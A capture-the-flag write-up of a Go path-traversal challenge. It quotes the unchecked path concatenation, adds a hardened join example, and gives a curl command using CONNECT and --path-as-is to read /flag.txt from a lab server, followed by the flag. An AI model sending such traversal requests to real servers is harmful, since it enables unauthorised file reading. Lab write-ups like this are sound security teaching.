Guidance

Solved by: Hanxoe

Can you find a way to enter that path? or do you need guidance?

Flag file in /flag.txt

10.4.79.68:20006

author: anarchistx

In this challenge, we are provided with a file named main.go. Several lines in that file look suspicious, specifically this code:

    p := "." + rawPath
    if _, err := os.Stat(p); err != nil {
        http.NotFound(w, r)
        return
    }

    f, err := os.Open(p)
    if err != nil {
        http.NotFound(w, r)
        return
    }
    defer f.Close()

This line directly concatenates the current directory (.) with the user-supplied path (rawPath) without checking for directory traversal sequences (../).
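
For comparison, here is the concatenation next to a hardened join, as an added example that is not part of the challenge's main.go. The helper `safeJoin`, the error `errTraversal`, the web root `/srv/app/public` and the sample paths are assumptions made for the demonstration; `/../../../flag.txt` is the path used in this write-up.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

var errTraversal = errors.New("path escapes web root")

// vulnerableJoin mirrors the challenge's `p := "." + rawPath`.
func vulnerableJoin(rawPath string) string {
	return "." + rawPath
}

// safeJoin is a hypothetical helper (not in main.go). It resolves rawPath
// under root and rejects any result outside root, whatever the HTTP method
// or client-side normalization. The check is lexical: symlinks inside root
// are not resolved.
func safeJoin(root, rawPath string) (string, error) {
	if strings.ContainsRune(rawPath, 0) {
		return "", errTraversal
	}
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	// Join cleans the result, so "../" segments are collapsed here.
	candidate := filepath.Join(absRoot, filepath.FromSlash(rawPath))
	rel, err := filepath.Rel(absRoot, candidate)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errTraversal
	}
	return candidate, nil
}

func main() {
	root := "/srv/app/public" // constructed web root for the demo
	// Constructed request paths; the second is the one from the write-up.
	for _, raw := range []string{"/index.html", "/../../../flag.txt", "/a/../b.txt", "/..hidden"} {
		p, err := safeJoin(root, raw)
		fmt.Printf("%-22q vulnerable=%-24q safe=%q err=%v\n", raw, vulnerableJoin(raw), p, err)
	}
}
```

On Go 1.24 and later, os.OpenRoot provides directory-confined opens that also cover symlinks.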

Standard GET requests usually fail because the Go server or an upstream proxy normalizes the path (../ is removed) or applies security filters.

The key to bypassing this is using:

  • HTTP Method: The uncommon CONNECT method.

  • Path Bypass: Using the flag --path-as-is (or similar client settings) to prevent URL normalization.

You would use a tool like curl that allows specifying the CONNECT method and preventing path normalization.

curl -X CONNECT --path-as-is "http://10.4.79.68:20006/../../../flag.txt"

Yeaaah...

compit{0nly_ur_h4nds_th4t_c4n_gu1d3_m3_thr0ugh_th1s_cru3l_j0urn3y_th4ts_full_0f_f4ls3_p4th5_4nd_r3r0ut3s}